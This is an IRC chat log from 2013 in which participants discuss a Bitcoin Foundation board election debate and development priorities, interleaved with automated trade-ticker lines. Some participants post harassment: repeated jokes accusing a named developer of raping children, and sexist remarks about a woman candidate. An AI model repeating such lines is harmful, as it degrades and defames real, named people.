16 01:17:21 Bitcoin Foundation Final Debate | Lets Talk Bitcoin Sep 16 01:17:28 if anyone is brave and bored... Sep 16 01:17:40 [MPEX] [S.MPOE] 4839 @ 0.0008929 = 4.3207 BTC [+] Sep 16 01:17:42 [MPEX] [S.MPOE] 750 @ 0.00089394 = 0.6705 BTC [+] Sep 16 01:17:57 [MPEX] [S.MPOE] 5150 @ 0.00089495 = 4.609 BTC [+] Sep 16 01:18:02 i think the best would be to look out for other trading softwares. tbh i didn't do much research and nt is cool, but maybe not the best fit for our purposes Sep 16 01:18:37 [HAVELOCK] [LABCO] 400 @ 0.0029 = 1.16 BTC [+] Sep 16 01:18:41 Bitcoin Foundation a Final Solution Sep 16 01:18:55 dexX7 what are you trying to do Sep 16 01:19:32 LukeJr is a finalist btw Sep 16 01:19:43 Bitcoin Foundation. "We're irrelevant so you don't have to be!" Sep 16 01:19:57 http://en.wikipedia.org/wiki/Information_Age but for purposes of my point i consider it: instant free access to a global bullshit detector Sep 16 01:20:18 uh. there is no such access and no such detector. Sep 16 01:20:20 kakobrekla: well, i'm able to parse bitstamp/btct data into a format that can be imported as historical data into nt, but it would be neat if i could submit trades via ninjatrader Sep 16 01:20:21 also there are effectively zero socialist parties in america Sep 16 01:20:34 Duffer1 are you kidding me ? socialised medicine passed by a joint vote. Sep 16 01:20:50 aha Sep 16 01:20:52 insurance reform passed by a democrat only vote Sep 16 01:21:08 even if you can have instant access to the correct information, it is drowned in a sea of misinformation, or just stupid useless content Sep 16 01:21:12 i would propose you yourself as anecdotal proof that no such bulslhit detector either exists or is available. Sep 16 01:21:14 it's not even single payer Sep 16 01:22:24 ThickAsThieves: is there supposed to be some audio with that? Sep 16 01:22:33 yes Sep 16 01:22:49 Flash maybe? Sep 16 01:23:02 yeah it loaded on second try Sep 16 01:24:35 i tried to make an account at btc foundation's website, it says i get a confirmation email, but never arrived Sep 16 01:24:49 check teh spam. Sep 16 01:24:53 not there either Sep 16 01:25:20 [BTCTC] [ACTIVEMINING] 333 @ 0.0026 = 0.8658 BTC [-] Sep 16 01:25:22 [BTCTC] [ACTIVEMINING] 30 @ 0.0026 = 0.078 BTC [-] Sep 16 01:25:23 [BTCTC] [ACTIVEMINING] 17 @ 0.002595 = 0.0441 BTC [-] Sep 16 01:25:23 [BTCTC] [ACTIVEMINING] 193 @ 0.00256 = 0.4941 BTC [-] Sep 16 01:25:24 [BTCTC] [ACTIVEMINING] 48 @ 0.002556 = 0.1227 BTC [-] Sep 16 01:25:26 [BTCTC] [ACTIVEMINING] 375 @ 0.002553 = 0.9574 BTC [-] Sep 16 01:25:27 [BTCTC] [ACTIVEMINING] 622 @ 0.002552 = 1.5873 BTC [-] Sep 16 01:25:38 this ploshay girl has no shortage of hot air Sep 16 01:26:10 pics of elizabeth? Sep 16 01:26:15 hmm Sep 16 01:26:19 sounds a bit fat Sep 16 01:26:23 [BTCTC] [LABCOIN] 19 @ 0.002867 = 0.0545 BTC [-] Sep 16 01:26:24 [BTCTC] [LABCOIN] 19 @ 0.002868 = 0.0545 BTC [+] Sep 16 01:26:25 [BTCTC] [LABCOIN] 19 @ 0.002873 = 0.0546 BTC [+] Sep 16 01:26:27 [BTCTC] [LABCOIN] 1000 @ 0.0029 = 2.9 BTC [+] Sep 16 01:26:28 [BTCTC] [LABCOIN] 280 @ 0.002926 = 0.8193 BTC [+] Sep 16 01:26:29 [BTCTC] [LABCOIN] 101 @ 0.002926 = 0.2955 BTC [+] Sep 16 01:26:40 http://bitcoinmagazine.com/wp-content/uploads/2012/02/Elizabeth-T.-Ploshay-Headshot-.png Sep 16 01:27:34 Trace Mayer http://www.runtogold.com/images/trace-mayer-bnn.jpg Sep 16 01:28:13 all pics here actually http://bitcoinmagazine.com/6823/bitcoin-foundation-individual-seat-candidate-transcription-index/ Sep 16 01:29:18 [BTCTC] [PETA-MINE] 1 @ 0.655 BTC [-] Sep 16 01:29:59 I like Joerg Platzer (the pic, don't know who he is) Sep 16 01:30:27 he's the hard-ass of the group it seems Sep 16 01:30:44 isn't that the berlin guy? Sep 16 01:30:53 yes Sep 16 01:31:17 why has luke photoshopped himself over a pic of some mining gear Sep 16 01:31:45 "Crypto currency will regulate the regulators." I like this guy :p Sep 16 01:32:13 maybe he let the neckbeard go our of control and chose to photochop his best pic on hand? Sep 16 01:32:18 out* Sep 16 01:33:42 there's worse than showing bfl hardware: showing a baby Sep 16 01:33:45 Should the foundation have a role in Bitcoin software dev? Sep 16 01:34:22 pankkake: well hopefully Luke-Jr doesnt post pics of him raping babies Sep 16 01:34:39 Luke - No, but give community a way to vote, Liz - No, but we all know gavin works at the foundation Sep 16 01:35:32 Joerg, Yes it should via worldwide opinion Sep 16 01:35:40 did Joerg say "+1 internets to trace"? Sep 16 01:35:51 is that what it was? Sep 16 01:35:52 hehe Sep 16 01:36:38 [BTCTC] [LABCOIN] 18 @ 0.002879 = 0.0518 BTC [-] Sep 16 01:36:46 Ben - No, Gavin shouldnt be paid by FOundation either (conflict of interest) Sep 16 01:37:01 [using my words here] Sep 16 01:37:34 [BTCTC] [LABCOIN] 18 @ 0.002918 = 0.0525 BTC [+] Sep 16 01:37:34 right, and the foundation can then ask for donations honestly, "so that ycombinator deadbeats may continue pretending like they're businessmen" Sep 16 01:37:36 [BTCTC] [LABCOIN] 82 @ 0.002926 = 0.2399 BTC [+] Sep 16 01:37:43 or, alternatively, "so that nsa budget is relieved a little" Sep 16 01:38:34 [BTCTC] [DMS.PURCHASE] 9 @ 0.00935 = 0.0842 BTC [-] Sep 16 01:38:35 [BTCTC] [DMS.PURCHASE] 69 @ 0.009377 = 0.647 BTC [+] Sep 16 01:38:37 a French newspaper said bitcoins were "created by the mysterious bitcoin foundation" Sep 16 01:38:45 lol Sep 16 01:38:46 Trace - Yes, Foundation should have role in deciding features Sep 16 01:38:59 [BTCTC] [NASTY-PT] 10 @ 0.001856 = 0.0186 BTC [+] Sep 16 01:39:27 he also likes idea of a super-majority consensus to decide new featyures Sep 16 01:39:42 [BTCTC] [LABCOIN] 400 @ 0.002926 = 1.1704 BTC [+] Sep 16 01:40:15 [BTCTC] [CIPHERMINE.B1] 21 @ 0.01027 = 0.2157 BTC [-] Sep 16 01:40:17 [BTCTC] [CIPHERMINE.B1] 84 @ 0.01027 = 0.8627 BTC [-] Sep 16 01:40:29 Trace badmouths LukeJr for not allowing Jon Matonis as a press contact of bitcoin foundation Sep 16 01:40:33 [MPEX] [S.MG] 50000 @ 0.0002 = 10 BTC [-] Sep 16 01:41:15 [BTCTC] [LABCOIN] 18 @ 0.002918 = 0.0525 BTC [-] Sep 16 01:41:20 LukeJr says no fair, Trace Sep 16 01:41:29 [BTCTC] [DMS.MINING] 50 @ 0.002324 = 0.1162 BTC [-] Sep 16 01:41:42 Joerg says no Luke, Trace his right Sep 16 01:42:34 Roger Ver donated 5000btc to Foundation Sep 16 01:42:35 [BTCTC] [DMS.MINING] 78 @ 0.002324 = 0.1813 BTC [-] Sep 16 01:43:14 [BTCTC] [DMS.MINING] 3 @ 0.002424 = 0.0073 BTC [+] Sep 16 01:43:28 Liz says Foundation needs to better manage outward infighting so they dont look like derps Sep 16 01:43:42 and promote decentralization Sep 16 01:43:46 [BTCTC] [TAT.ASICMINER] 18 @ 0.01963 = 0.3533 BTC [-] Sep 16 01:43:55 [again my words] Sep 16 01:44:29 why do you think this is so important, anyway ? Sep 16 01:44:47 Luke says Foundation shouldnt be bought (references Ver donation) Sep 16 01:45:06 because like it or not these guyse are gonna influence some things Sep 16 01:45:10 ver donated 5k back when it was whatever, 50k. Sep 16 01:45:22 and they're gonna influence exactly you, for as long as you stick to that notion. Sep 16 01:45:26 otherwise... hardly, rly. Sep 16 01:46:05 Joerg doesnt want Foundation to turn into a US bitcoin-business club Sep 16 01:47:48 I like how he refers to it as 'the foundation community' Sep 16 01:48:25 i disagree that i'm the one they'll be influencing, and disagree that they will have no influence of note Sep 16 01:48:32 correclty inferring that the election is for a small role in a small circle jerk Sep 16 01:48:40 [BTCTC] [ACTIVEMINING] 100 @ 0.002686 = 0.2686 BTC [+] Sep 16 01:48:52 i dont have to like or agree with their plot to acknowledge it Sep 16 01:49:02 [BTCTC] [ASICMINER-PT] 1 @ 2.059 BTC [-] Sep 16 01:49:03 [BTCTC] [ASICMINER-PT] 1 @ 2.06 BTC [+] Sep 16 01:49:04 [BTCTC] [ASICMINER-PT] 2 @ 2.085 = 4.17 BTC [+] Sep 16 01:49:06 ok liz is on crack Sep 16 01:49:15 a bitcoin foundation in every country, wtf Sep 16 01:49:51 sorry 'establishing a bitcoin chapter in every country' Sep 16 01:50:54 TITS AND GET OUT Sep 16 01:51:05 [BTCTC] [TAT.ASICMINER] 29 @ 0.01958 = 0.5678 BTC [-] Sep 16 01:51:06 [BTCTC] [TAT.ASICMINER] 8 @ 0.0196 = 0.1568 BTC [+] Sep 16 01:51:42 [BTCTC] [TAT.ASICMINER] 2 @ 0.01957 = 0.0391 BTC [-] Sep 16 01:54:51 ThickAsThieves: I want to minimise the Foundation's influence as much as possible. Sep 16 01:55:17 it can help Bitcoin without trying to run the show Sep 16 01:55:19 so you want to join to dismantle it? Sep 16 01:55:32 [BTCTC] [DMS.MINING] 10 @ 0.002424 = 0.0242 BTC [+] Sep 16 01:55:38 does it not exist to influence? Sep 16 01:55:39 ThickAsThieves: I want it to empower others, without telling them how to do things Sep 16 01:55:51 [BTCTC] [LABCOIN] 18 @ 0.002892 = 0.0521 BTC [-] Sep 16 01:55:52 it exists to get money from MtGox/etc to Gavin, more or less Sep 16 01:55:54 [BTCTC] [ACTIVEMINING] 27 @ 0.002688 = 0.0726 BTC [+] Sep 16 01:56:08 basically so people who want to support Bitcoin have a way to donate Sep 16 01:56:25 so you consider it to be a scheme to fool people into giving to dev of the software? Sep 16 01:56:48 no, I consider it a way for people who want to support Bitcoin, to not have to do their own research on how to best spend the money Sep 16 01:57:01 how has your position on raping children changed? because raping your own children is one thing but when you branch out to raping other children it could reflect negatively on bitcoin Sep 16 01:57:10 they can just give bitcoins, and the Foundation handles distributing it to developers and other Bitcoin-promotion efforts Sep 16 01:57:19 luke-jr can you see how your comment sounds a lot like a nicer version of mine? Sep 16 01:57:52 ThickAsThieves: I think it should be perfectly clear what the purpose is, not "fool" anyone Sep 16 01:58:08 so you'd see the mission statement changed? Sep 16 01:58:13 ThickAsThieves: that's also part of why I think the Foundation should be open to input from people outside of it Sep 16 01:58:50 ThickAsThieves: I don't think it's at odds with the mission statement, though it could possibly be clarified Sep 16 01:58:56 maybe to something like The Foundation's purpose is to advocate for and solicit financial support for bitcoin software development? Sep 16 01:59:20 ThickAsThieves: it's not JUST for software dev; that Sep 16 01:59:25 that's just the first step Sep 16 01:59:42 https://bitcoinfoundation.org/about/ Sep 16 01:59:48 "By funding the Bitcoin infrastructure, including a core development team, we can make Bitcoin more respected, trusted and useful to people worldwide." Sep 16 01:59:53 keyword: funding Sep 16 02:00:10 it also makes reference to protecting and promoting Sep 16 02:00:10 you mention that the FOundation should not influence software dev though Sep 16 02:00:15 correct Sep 16 02:00:18 JUST fund it Sep 16 02:00:28 you think that separation is possible? Sep 16 02:00:40 I think it's more practical with a Foundation, than without one. Sep 16 02:00:59 some influence may be inevitable, but we should try to do our best to separate it Sep 16 02:01:08 you also mention soliciting the opinion of the "community" to decide these things Sep 16 02:01:16 is that truly possible? Sep 16 02:01:19 sure, why not? Sep 16 02:01:26 would it be members only? Sep 16 02:01:27 at the very least, we can setup a polling interface Sep 16 02:01:36 well, there needs to be some way to avoid sockpuppets Sep 16 02:01:51 I was thinking perhaps allowing a no-fee membership option\ Sep 16 02:01:55 does this not also filter out many other types of users? Sep 16 02:02:05 ? Sep 16 02:02:16 people who dont know to or care to become members Sep 16 02:02:35 if they don't care, they don't care.. not much anyone can do about that :/ Sep 16 02:02:42 [BTCTC] [ACTIVEMINING] 25 @ 0.002686 = 0.0672 BTC [-] Sep 16 02:02:51 they can care about bitcoin whilst not caring to join Sep 16 02:03:04 what would you suggest? Sep 16 02:03:15 making a spec, out on the open Sep 16 02:03:23 and let whatever succeeds succeed Sep 16 02:03:32 huh? Sep 16 02:03:44 are we talking about different things? :p Sep 16 02:03:48 [BTCTC] [LABCOIN] 350 @ 0.00289 = 1.0115 BTC [-] Sep 16 02:03:49 [BTCTC] [LABCOIN] 18 @ 0.00289 = 0.052 BTC [-] Sep 16 02:03:51 [BTCTC] [LABCOIN] 18 @ 0.00289 = 0.052 BTC [-] Sep 16 02:03:52 yes we are Sep 16 02:04:03 Foundation shouldn't be making specs; that's for people or small groups to do Sep 16 02:04:03 i'm saying the approach is flawed altogether Sep 16 02:04:11 i agree Sep 16 02:04:21 [BTCTC] [ACTIVEMINING] 4 @ 0.002701 = 0.0108 BTC [+] Sep 16 02:04:50 members are not qualified to influence anything Sep 16 02:05:06 by merely being members Sep 16 02:05:20 and non-members are not disqualified from having influence Sep 16 02:05:49 but to get funding from donations to developers/promoters/etc, *someone* needs to make the decision which projects get how much funding; that's the main role of the Foundation Sep 16 02:06:12 right now, that's done in private by the board Sep 16 02:06:27 with no accountability for the individual board members voting which way Sep 16 02:06:31 would not for-profit endeavors do that incidentally? Sep 16 02:06:49 ? Sep 16 02:07:47 in your system, the current Almighty Dev Team becomes a stronger and stronger centralized influence on bitocin dev Sep 16 02:07:49 right? Sep 16 02:08:02 no Sep 16 02:08:20 not sure how you got that from it Sep 16 02:08:28 so you want Gavin to be stronger but not stronger Sep 16 02:08:41 no Sep 16 02:09:21 I want the public to know what decisions are being made by the board, and which members voted for those decisions which way; and to have my votes on the board be something I consult with the community on Sep 16 02:09:53 [MPEX] [S.MPOE] 5800 @ 0.00089812 = 5.2091 BTC [+] Sep 16 02:09:54 [MPEX] [S.MPOE] 7850 @ 0.0008982 = 7.0509 BTC [+] Sep 16 02:09:54 [BTCTC] [TAT.ASICMINER] 44 @ 0.01916 = 0.843 BTC [-] Sep 16 02:09:56 [BTCTC] [TAT.ASICMINER] 9 @ 0.01915 = 0.1724 BTC [-] Sep 16 02:10:14 [BTCTC] [LABCOIN] 53 @ 0.00289 = 0.1532 BTC [-] Sep 16 02:10:18 i'm generally of the opinion that, in most situations, the community at large is not qualified to make decisions Sep 16 02:10:44 Luke-Jr relax, no decisions are made by the board. Sep 16 02:11:18 ThickAsThieves: input can be weighed. maybe put together some basic tests to show people know the subject, for polls, etc. Sep 16 02:11:36 this is awfully naive of a path no? Sep 16 02:11:39 [BTCTC] [ACTIVEMINING] 9 @ 0.002705 = 0.0243 BTC [+] Sep 16 02:11:41 I'm not saying I have the perfect solution, just that it's too centralised right now Sep 16 02:11:56 well typically, part of my problem-solving Sep 16 02:12:00 is Sep 16 02:12:13 when a problem feels unsolvable, you might be solving the wrong problem Sep 16 02:12:56 ThickAsThieves: so you would just disband the Foundation entirely, and if people want to donate they MUST do homework to figure out who/how? Sep 16 02:12:59 or> Sep 16 02:13:01 ? Sep 16 02:13:04 it can help Bitcoin without trying to run the show <<< look, you know as well as i do the foundation is essentially purposeless, but has been recently re-purposed on the fly so as to give the usg muppets some pleasurable way to waste their time. Sep 16 02:13:17 i dont think the Foundation should remotely exist in the ways you idealize Sep 16 02:13:21 so whatever, focus on maximal washington entertainment value. Sep 16 02:13:33 ^ Sep 16 02:13:42 O.o Sep 16 02:13:43 [BTCTC] [ACTIVEMINING] 12 @ 0.002701 = 0.0324 BTC [-] Sep 16 02:13:45 the BF is better used to lobby Sep 16 02:13:51 if you have an agenda Sep 16 02:13:56 go lobby it Sep 16 02:14:15 (as an organization) Sep 16 02:14:15 [BTCTC] [LABCOIN] 361 @ 0.00289 = 1.0433 BTC [-] Sep 16 02:14:16 [BTCTC] [LABCOIN] 3000 @ 0.0029 = 8.7 BTC [+] Sep 16 02:14:17 [BTCTC] [LABCOIN] 10 @ 0.00292 = 0.0292 BTC [+] Sep 16 02:14:18 [BTCTC] [LABCOIN] 18 @ 0.00292 = 0.0526 BTC [+] Sep 16 02:14:19 [BTCTC] [LABCOIN] 18 @ 0.00292 = 0.0526 BTC [+] Sep 16 02:14:20 [BTCTC] [LABCOIN] 18 @ 0.002925 = 0.0527 BTC [+] Sep 16 02:14:21 [BTCTC] [LABCOIN] 18 @ 0.002926 = 0.0527 BTC [+] Sep 16 02:14:21 [BTCTC] [LABCOIN] 1437 @ 0.002927 = 4.2061 BTC [+] Sep 16 02:14:22 [BTCTC] [LABCOIN] 100 @ 0.002928 = 0.2928 BTC [+] Sep 16 02:14:23 [BTCTC] [LABCOIN] 1000 @ 0.00293 = 2.93 BTC [+] Sep 16 02:14:24 [BTCTC] [LABCOIN] 3500 @ 0.00295 = 10.325 BTC [+] Sep 16 02:14:25 [BTCTC] [LABCOIN] 750 @ 0.002998 = 2.2485 BTC [+] Sep 16 02:14:27 [BTCTC] [LABCOIN] 30 @ 0.002999 = 0.09 BTC [+] Sep 16 02:14:28 [BTCTC] [LABCOIN] 1041 @ 0.002999 = 3.122 BTC [+] Sep 16 02:14:29 [BTCTC] [LABCOIN] 200 @ 0.003 = 0.6 BTC [+] Sep 16 02:14:30 [BTCTC] [LABCOIN] 3400 @ 0.003 = 10.2 BTC [+] Sep 16 02:14:31 [BTCTC] [LABCOIN] 3500 @ 0.003 = 10.5 BTC [+] Sep 16 02:14:31 [BTCTC] [LABCOIN] 10 @ 0.003039 = 0.0304 BTC [+] Sep 16 02:14:32 [BTCTC] [LABCOIN] 100 @ 0.00304 = 0.304 BTC [+] Sep 16 02:14:33 [BTCTC] [LABCOIN] 30 @ 0.003099 = 0.093 BTC [+] Sep 16 02:14:34 [BTCTC] [LABCOIN] 1915 @ 0.0031 = 5.9365 BTC [+] Sep 16 02:14:35 [BTCTC] [LABCOIN] 1000 @ 0.003179 = 3.179 BTC [+] Sep 16 02:14:36 [BTCTC] [LABCOIN] 1000 @ 0.00318 = 3.18 BTC [+] Sep 16 02:14:37 [BTCTC] [LABCOIN] 1000 @ 0.003181 = 3.181 BTC [+] Sep 16 02:14:38 [BTCTC] [LABCOIN] 30 @ 0.003182 = 0.0955 BTC [+] Sep 16 02:14:39 [BTCTC] [LABCOIN] 1714 @ 0.003183 = 5.4557 BTC [+] Sep 16 02:15:16 if BF can be a force to mitigate the fumbling of goverments attempting to regulate bitcoin, then i might support it Sep 16 02:15:49 ThickAsThieves: lobbying is inherently national Sep 16 02:15:51 lol right. mkay. Sep 16 02:16:26 ThickAsThieves: I certainly think funding lobbying groups should be discussed, but just funding them, not controlling them Sep 16 02:16:43 it's ridiculously simple : you go ahead and promise absolutely anything you want. we won't deliver any of it, but hey, if they deliver anything on the strength of your empty promises, all the better. Sep 16 02:16:51 ultimate exercise in something for nothing extraction. Sep 16 02:18:12 if the Foundation tries to directly manage lobbying in every country, it *will* fail Sep 16 02:18:52 local groups, on the other hand, have a much better chance. I'd rather bet on them. Sep 16 02:19:24 i'm not versed on the lobbying world, but I suspect reality is the opposite of your vision Sep 16 02:20:28 [BTCTC] [ASICMINER-PT] 1 @ 2.014 BTC [-] Sep 16 02:20:29 [BTCTC] [ASICMINER-PT] 1 @ 2.013 BTC [-] Sep 16 02:20:31 [BTCTC] [ASICMINER-PT] 1 @ 2.013 BTC [-] Sep 16 02:20:31 [BTCTC] [ASICMINER-PT] 2 @ 2.012 = 4.024 BTC [-] Sep 16 02:20:32 [BTCTC] [ASICMINER-PT] 5 @ 2.011 = 10.055 BTC [-] Sep 16 02:20:37 or by local do you mean national instead of international groups Sep 16 02:20:41 right Sep 16 02:20:53 but the BF is pretty much US atm Sep 16 02:21:01 it's not, though, that's the thing Sep 16 02:21:07 maybe let each country sort out their own foundation Sep 16 02:21:15 which is probly what will happen anyway Sep 16 02:21:26 that might not be a bad idea, but it works against Bitcoin's globalism Sep 16 02:21:41 depends how you look at it Sep 16 02:21:44 [BTCTC] [LABCOIN] 19 @ 0.003053 = 0.058 BTC [-] Sep 16 02:22:21 of the 5 current board members, only 3 are US Sep 16 02:22:54 sure, it's a majority, but it's certainly not one-sided Sep 16 02:23:40 s/one-sided/US-only/ Sep 16 02:23:52 joerg wants to be hardcore Sep 16 02:24:00 really that's more of a problem for the foundation itself Sep 16 02:24:40 if it 'feels' like an American thing, or VC club, or whatever, than anyone that doesnt like such will not respect it Sep 16 02:24:43 [BTCTC] [LABCOIN] 19 @ 0.003115 = 0.0592 BTC [+] Sep 16 02:24:48 then* Sep 16 02:25:45 [BTCTC] [LABCOIN] 493 @ 0.003181 = 1.5682 BTC [+] Sep 16 02:25:46 [BTCTC] [LABCOIN] 1107 @ 0.003182 = 3.5225 BTC [+] Sep 16 02:26:11 ThickAsThieves you're missing the part where in no way will an open, above the ground political party of bitcoin interest can exist or makes sense to exist before bitcoin is a world dominating sovereign. Sep 16 02:26:22 ThickAsThieves: I think "American thing" is just Joerg's way of trying to get elected Sep 16 02:26:42 until we have a majority of the aircradft carriers on the oceans, it'll be this muppet strawman thing. Sep 16 02:27:11 ThickAsThieves: just as the "men vs women" is a tactic Elizabeth is using Sep 16 02:27:13 maybe, i think there is something to what Joerg is trying to say, on that it will be more respected as an international organization if it is diverse, Sep 16 02:27:23 [BTCTC] [BTC-GROWTH] 12 @ 0.1035 = 1.242 BTC [+] Sep 16 02:27:29 but he failed at differentiating that from some sort of affirmative action plea Sep 16 02:27:37 [BTCTC] [LABCOIN] 110 @ 0.003181 = 0.3499 BTC [-] Sep 16 02:27:49 [BTCTC] [TAT.ASICMINER] 2 @ 0.01953 = 0.0391 BTC [+] Sep 16 02:27:50 [BTCTC] [ASICMINER-PT] 2 @ 2.08 = 4.16 BTC [+] Sep 16 02:28:25 i believe it's important for such a board to exist for the sole purpose of ensuring america doesn't get left in the dark ages, i see no real value for it to exist for anything else btc related Sep 16 02:28:43 [BTCTC] [LABCOIN] 4 @ 0.003181 = 0.0127 BTC [-] Sep 16 02:29:03 Duffer1 so what if it does get left in the dark ages ? i mean... who cares. shit happens, countries die all the time. Sep 16 02:29:22 i suppose americans care Sep 16 02:29:27 look at the board makeup:) Sep 16 02:29:48 americans need someone to lead them Sep 16 02:29:53 i care for personal reasons, and I would like to see america not get left bhind Sep 16 02:30:07 they can't think for themselves Sep 16 02:30:13 er americans* Sep 16 02:30:28 they can't think for themselves <<< which why i dont want them voting on btc software features Sep 16 02:30:34 is Sep 16 02:31:07 Duffer1 i can respect that, but seriously... i'm very skeptical. Sep 16 02:31:18 skeptical of? Sep 16 02:31:27 when did we even accept that new features are a thing the community at large even wants Sep 16 02:31:35 it's not a sort of rara hate america thing, but moreover... those people have run themselves into a corner already. Sep 16 02:31:40 ThickAsThieves: Nobody is voting on Bitcoin software features. Sep 16 02:31:51 you expect them to somehow suddenly jump the fence ? hardly. they have other problems, like you know, how to live without credit. Sep 16 02:32:27 [HAVELOCK] [CBTC] 10 @ 0.0004299 = 0.0043 BTC [+] Sep 16 02:32:53 why cant we let for-profit service providers come up with the features Sep 16 02:33:12 and let bitcoin core be the bitcoin core it already is Sep 16 02:33:13 who's "we" and what says "we" aren't ?! Sep 16 02:33:27 we are Sep 16 02:33:38 bah i'm tryin to eat wings here, can't have a convo like this with wing sauce all over Sep 16 02:33:39 that's edifying. Sep 16 02:33:41 if I am elected, it's New York, Florida, California, Japan, Australia, Venezuela, and wherever Matonis resides Sep 16 02:34:07 it is possible "venezuela" might have not heard of you, you know. Sep 16 02:34:10 ThickAsThieves: development functions independent of the Foundation already and for the forseeable future Sep 16 02:34:29 i dont think you understand what "we" are saying Sep 16 02:34:48 who ? Sep 16 02:34:53 i'm saying the core devs may have no purpose at all Sep 16 02:35:03 the software exists Sep 16 02:35:04 (best abott and costello routine to date!) Sep 16 02:35:07 it's done Sep 16 02:35:15 ThickAsThieves: it's far from done Sep 16 02:35:17 it's still beta Sep 16 02:35:19 lol Sep 16 02:35:22 i love that Sep 16 02:35:30 it's still in beta! Sep 16 02:35:35 it's not even well-usable yet Sep 16 02:35:40 takes like a day to sync Sep 16 02:35:48 ThickAsThieves it's a piece of shit, practically. why, just last march, just as Luke-Jr & friends were trying to mount the entire "sdice is bad" offensive, they got cut down by a sudden fork! Sep 16 02:35:56 when it will be out of beta? current devs prefer adding features Sep 16 02:36:17 which was wholly unexpected because it turns out, nobody on power ranger team had read or understood their own databasecode. Sep 16 02:36:20 which ended up with 0.8 crap that is being fixed since Sep 16 02:36:21 jurov: when it supports everything fundamental Sep 16 02:36:28 jurov: uh, what? Sep 16 02:36:44 is it specified anywhere what is "fundamental" Sep 16 02:36:46 haha luke is for the ladies Sep 16 02:36:46 ??? Sep 16 02:37:03 jurov: I'm not sure; at the very least, easy to use and secure Sep 16 02:37:15 ic Sep 16 02:37:20 jurov: the majority of current work is being done for those two goals Sep 16 02:37:42 i just dont like the concept that the Devs pretty much act as the keepers and drivers of bitcoin software Sep 16 02:37:55 Luke-Jr: how are you going to be useful on this quantum bullshit operation and the "foundation" at the same time? Sep 16 02:38:00 ThickAsThieves you perceive this as somehow related to the foundation thingee ? Sep 16 02:38:04 ThickAsThieves: if you don't like it, fork and maintain it yourself; at least I will support you Sep 16 02:38:34 and i don't like they kinda blindly stumble towards "moar easy to use and secure" Sep 16 02:38:34 benkay: I don't expect that quantum nonsense to go anywhere that needs my involvement. Sep 16 02:38:49 yes it is related, at least in the context that we are talking to Luke, Luke wants to be on the board, and Luke sees the BF's purpose as to provide funding for these Devs Sep 16 02:38:52 jurov: I'm not sure blindly is correct there. Sep 16 02:38:53 Luke-Jr one day you'll learn it's a bad idea to involve yourself in name only. Sep 16 02:39:08 ThickAsThieves: for *all* devs, not just Bitcoin-Qt Sep 16 02:39:28 [BTCTC] [ACTIVEMINING] 175 @ 0.002703 = 0.473 BTC [+] Sep 16 02:39:35 so it will provide grants and such? Sep 16 02:39:42 ThickAsThieves: yes, it already does Sep 16 02:39:43 more easy to use and secure means to have a sane interface, not that RPC shit Sep 16 02:39:46 to me Sep 16 02:39:47 just right now that happens behind closed doors Sep 16 02:39:57 except it doesn't really happen, but anyway. Sep 16 02:40:01 I think at least Armory has received a few grants Sep 16 02:40:24 [BTCTC] [LABCOIN] 18 @ 0.003101 = 0.0558 BTC [-] Sep 16 02:40:26 [BTCTC] [LABCOIN] 2 @ 0.003096 = 0.0062 BTC [-] Sep 16 02:40:33 jurov: the RPC crap is just bitcoind; Bitcoin-Qt has a slightly okay interface, which hopefully will improve much by 1.0 Sep 16 02:40:38 Armory is great. Sep 16 02:40:39 jurov: did you see my mockups? Sep 16 02:40:50 A bit slow tho Sep 16 02:40:51 no, which mockups? Sep 16 02:40:56 Namworld: indeed, just wish it used current Python and didn't mmap everyhting :p Sep 16 02:41:05 jurov: http://luke.dashjr.org/tmp/code/20130830-ReceiveMockup.png Sep 16 02:41:20 coin control build wins Sep 16 02:41:21 [BTCTC] [CIPHERMINE-PT] 10 @ 0.05995 = 0.5995 BTC [-] Sep 16 02:41:43 [HAVELOCK] [CFIG] 1 @ 0.148899 BTC [+] Sep 16 02:41:45 kakobrekla: that's *supposed* to be going into 0.9 finally Sep 16 02:42:01 about fuckin time or smth Sep 16 02:42:03 lol i don't mean such interface. i mean real API which can be a good interface built on Sep 16 02:42:17 jurov: oh, between the wallet and GUI? Sep 16 02:42:31 the current RPC is not even sufficient for bitcoin-qt itself Sep 16 02:42:35 jurov: yeah, something would be nice. that's progressing pretty slow though, as focus has been on end users Sep 16 02:42:35 yes Sep 16 02:43:00 0.9 *does* have a more modular codebase though Sep 16 02:43:06 kakobrekla considering the encrypted wallet.dat did eventually make it through, i have high hopes. Sep 16 02:43:16 lol Sep 16 02:43:32 srsly. so it is a year or two late. coulda been worse. Sep 16 02:43:48 i guess Sep 16 02:43:50 [HAVELOCK] [XBOND] 706 @ 0.00118 = 0.8331 BTC [-] Sep 16 02:43:54 [HAVELOCK] [XBOND] 1020 @ 0.00118999 = 1.2138 BTC [+] Sep 16 02:43:58 [HAVELOCK] [XBOND] 774 @ 0.00119 = 0.9211 BTC [+] Sep 16 02:44:44 [BTCTC] [LABCOIN] 17 @ 0.003096 = 0.0526 BTC [-] Sep 16 02:45:05 Luke-Jr: why the care for end users? there are plenty of service providers that can do it Sep 16 02:45:10 just draw a line Sep 16 02:45:25 serve the servants Sep 16 02:45:25 because they're msision confused because they have no leadership because well... Sep 16 02:45:28 let's not get into that. Sep 16 02:45:29 jurov: because service providers are centralised, and most people are end users Sep 16 02:45:45 [BTCTC] [LABCOIN] 19 @ 0.003062 = 0.0582 BTC [-] Sep 16 02:45:59 [BTCTC] [ACTIVEMINING] 784 @ 0.0027 = 2.1168 BTC [-] Sep 16 02:46:48 and so you will focus to things as optimizing first sync speed and introducing moar bugs in the process Sep 16 02:46:55 [HAVELOCK] [DEALCO] 10 @ 0.00845 = 0.0845 BTC [-] Sep 16 02:47:03 probably Sep 16 02:47:08 good thing I maintain stable versions Sep 16 02:47:10 :P Sep 16 02:47:20 i think jurov has a point Sep 16 02:47:23 [HAVELOCK] [LABCO] 10 @ 0.003 = 0.03 BTC [+] Sep 16 02:47:34 all changes introduce bugs, that's unavoidable Sep 16 02:47:40 ;/ Sep 16 02:47:51 pity you can't be fired for that stupidity, as you don't really work here. Sep 16 02:47:52 [HAVELOCK] [XBOND] 10 @ 0.00119 = 0.0119 BTC [+] Sep 16 02:48:11 maybe his job is to introduce bugs Sep 16 02:48:17 perfect code does not exist Sep 16 02:48:26 stop strawman-ing. Sep 16 02:48:27 instead of focusing on fancy designs and minor features, get the core-work done (sorry, just jumped in, if this is completely out of context) Sep 16 02:48:43 two words. reference implementation Sep 16 02:49:04 jurov no because that's hard because it requires people to read code, which they don't like to do because amateur means illiterate. Sep 16 02:49:18 much better to be randomly humiliated whenever anyone feels like it. Sep 16 02:49:33 jurov: reference implementation means something different in bitcoin than any other software Sep 16 